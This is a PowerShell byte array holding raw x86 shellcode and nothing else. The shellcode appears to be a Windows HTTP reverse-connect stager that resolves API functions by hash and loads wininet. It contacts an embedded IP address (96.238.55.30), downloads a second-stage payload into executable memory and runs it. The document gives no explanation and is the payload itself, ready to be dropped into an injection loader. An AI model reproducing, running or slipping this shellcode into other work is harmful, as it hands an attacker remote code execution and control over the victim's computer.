[Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31
$buf += 0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52
$buf += 0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff
$buf += 0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd
$buf += 0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b
$buf += 0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1
$buf += 0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3
$buf += 0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac
$buf += 0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3
$buf += 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58
$buf += 0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c
$buf += 0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24
$buf += 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f
$buf += 0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65
$buf += 0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c
$buf += 0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53
$buf += 0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53
$buf += 0x53,0x6a,0x3,0x53,0x53,0x6a,0x35,0xe8,0x68,0x1
$buf += 0x0,0x0,0x2f,0x68,0x50,0x59,0x34,0x59,0x30,0x6b
$buf += 0x2d,0x4e,0x69,0x36,0x39,0x31,0x37,0x7a,0x57,0x35
$buf += 0x57,0x64,0x51,0x71,0x51,0x31,0x46,0x73,0x50,0x76
$buf += 0x62,0x7a,0x6f,0x6e,0x49,0x42,0x44,0x6a,0x39,0x56
$buf += 0x39,0x59,0x5f,0x4a,0x41,0x45,0x6e,0x76,0x73,0x78
$buf += 0x55,0x45,0x52,0x67,0x79,0x70,0x62,0x51,0x35,0x41
$buf += 0x59,0x32,0x6a,0x31,0x54,0x48,0x4b,0x31,0x7a,0x44
$buf += 0x43,0x43,0x59,0x49,0x37,0x42,0x44,0x39,0x66,0x4e
$buf += 0x5f,0x63,0x37,0x31,0x57,0x46,0x4e,0x32,0x30,0x64
$buf += 0x74,0x58,0x55,0x6e,0x79,0x4e,0x7a,0x5f,0x36,0x54
$buf += 0x79,0x73,0x4a,0x75,0x6f,0x33,0x6e,0x76,0x51,0x52
$buf += 0x61,0x53,0x43,0x44,0x79,0x56,0x65,0x73,0x5a,0x5a
$buf += 0x37,0x36,0x72,0x39,0x75,0x35,0x58,0x70,0x42,0x66
$buf += 0x44,0x44,0x5a,0x45,0x55,0x4f,0x62,0x47,0x37,0x37
$buf += 0x42,0x4a,0x44,0x78,0x49,0x49,0x6b,0x59,0x76,0x39
$buf += 0x6f,0x6a,0x66,0x73,0x75,0x71,0x37,0x45,0x4b,0x6d
$buf += 0x6a,0x6f,0x33,0x4a,0x77,0x42,0x63,0x6a,0x4d,0x4b
$buf += 0x47,0x53,0x53,0x62,0x6b,0x34,0x65,0x4e,0x5f,0x69
$buf += 0x38,0x36,0x38,0x5f,0x7a,0x30,0x4f,0x7a,0x5a,0x55
$buf += 0x65,0x46,0x74,0x4c,0x36,0x36,0x4f,0x5f,0x73,0x70
$buf += 0x70,0x5a,0x5f,0x69,0x6d,0x46,0x37,0x61,0x2d,0x6b
$buf += 0x79,0x66,0x58,0x6f,0x57,0x49,0x36,0x54,0x43,0x56
$buf += 0x44,0x39,0x30,0x5f,0x4e,0x55,0x74,0x4a,0x51,0x36
$buf += 0x33,0x4a,0x48,0x52,0x47,0x43,0x38,0x42,0x54,0x50
$buf += 0x32,0x51,0x62,0x73,0x6f,0x67,0x59,0x43,0x48,0x66
$buf += 0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89
$buf += 0xc6,0x53,0x68,0x0,0x2,0x60,0x84,0x53,0x53,0x53
$buf += 0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5
$buf += 0x96,0x6a,0xa,0x5f,0x53,0x53,0x53,0x53,0x56,0x68
$buf += 0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x8
$buf += 0x4f,0x75,0xed,0xe8,0x49,0x0,0x0,0x0,0x6a,0x40
$buf += 0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0
$buf += 0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53
$buf += 0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53
$buf += 0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0
$buf += 0x74,0xcf,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5
$buf += 0x58,0xc3,0x5f,0xe8,0x8b,0xff,0xff,0xff,0x39,0x36
$buf += 0x2e,0x32,0x33,0x38,0x2e,0x35,0x35,0x2e,0x33,0x30
$buf += 0x0,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff
$buf += 0xd5
